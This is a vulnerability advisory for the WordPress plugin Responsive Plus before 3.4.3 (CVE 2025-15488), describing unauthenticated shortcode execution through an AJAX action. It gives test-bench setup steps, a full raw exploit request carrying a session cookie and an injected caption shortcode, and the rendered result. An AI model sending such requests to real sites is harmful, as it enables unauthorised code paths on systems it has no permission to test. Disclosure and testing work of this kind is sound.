Responsive Plus < 3.4.3 – Unauthenticated Arbitrary Shortcode Execution | CVE 2025-15488

Description

The plugin is vulnerable to arbitrary shortcode execution due to the software allowing unauthenticated users to execute the update_responsive_woo_free_shipping_left_shortcode AJAX action that does not properly validate the content_rech_data parameter before processing it as a shortcode.

Proof of Concept

Pre-Exploit setup:
1) Install WooCommerce: ddev wp plugin install woocommerce
2) Activate WooCommerce: ddev wp plugin activate woocommerce --network
3) As superadmin login to WordPress, click WooCommerce -> Settings -> Shipping -> Add Zone
4) Put any zone name. Click on Add Shipping Method -> Free Shipping. Under "Free Shipping Requires" select "Minimum Order Amount". Set 1 as amount and click save.
5) Make sure WooCommerce has at least one product. Go to WooCommerce -> Home -> Add your products. Put any product details, but set price to 2.
6) Launch your store by going to WooCommerce -> Home -> Launch your store.

Exploit steps:
1) Start capturing browser traffic with Burp Suite
2) As an unauthenticated attacker go to your WooCommerce store at /shop/
3) Add the only product in the store to your cart
4) Within Burp history find the latest GET /wp-json/wc/store/v1/cart request and copy its entire Cookie header
5) Paste the cookie header into the PoC AJAX request below and send it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: wpscan-vulnerability-test-bench.ddev.site
User-Agent: nos3curity
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: PHPSESSID=rttb4rddrgavr7dreflna7p9p2; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; tk_ai=woo%3AHRbySqygjSPpjCh76souJhtC; tk_qs=; wp-saving-post=59-saved; sbjs_migrations=1418474375998%3D1; sbjs_current_add=fd%3D2025-11-09%2020%3A44%3A42%7C%7C%7Cep%3Dhttp%3A%2F%2Fwpscan-vulnerability-test-bench.ddev.site%2F%7C%7C%7Crf%3D%28none%29; sbjs_first_add=fd%3D2025-11-09%2020%3A44%3A42%7C%7C%7Cep%3Dhttp%3A%2F%2Fwpscan-vulnerability-test-bench.ddev.site%2F%7C%7C%7Crf%3D%28none%29; sbjs_current=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_first=typ%3Dtypein%7C%7C%7Csrc%3D%28direct%29%7C%7C%7Cmdm%3D%28none%29%7C%7C%7Ccmp%3D%28none%29%7C%7C%7Ccnt%3D%28none%29%7C%7C%7Ctrm%3D%28none%29%7C%7C%7Cid%3D%28none%29%7C%7C%7Cplt%3D%28none%29%7C%7C%7Cfmt%3D%28none%29%7C%7C%7Ctct%3D%28none%29; sbjs_udata=vst%3D1%7C%7C%7Cuip%3D%28none%29%7C%7C%7Cuag%3DMozilla%2F5.0%20%28Macintosh%3B%20Intel%20Mac%20OS%20X%2010.15%3B%20rv%3A143.0%29%20Gecko%2F20100101%20Firefox%2F143.0; sbjs_session=pgs%3D12%7C%7C%7Ccpg%3Dhttp%3A%2F%2Fwpscan-vulnerability-test-bench.ddev.site%2Fshop%2F; woocommerce_items_in_cart=1; woocommerce_cart_hash=ccc70dc4d0bfc24c5f2cf1a523a38f5e; wp_woocommerce_session_3d77f233665988edd285430ac636292f=t_c9aa72c9b8699e250dd573680c661b%7C1762895003%7C1762808603%7C%24generic%24Em1vynzshTfJSxoDK3RhSK3XkROUonXdY-XOyWMH

action=update_responsive_woo_free_shipping_left_shortcode&content_rech_data=[caption]INJECTED[/caption]

6) Note that the caption shortcode was executed and rendered in the response: "<span class=\"responsive-woo-free-shipping\">INJECTED<\/span>"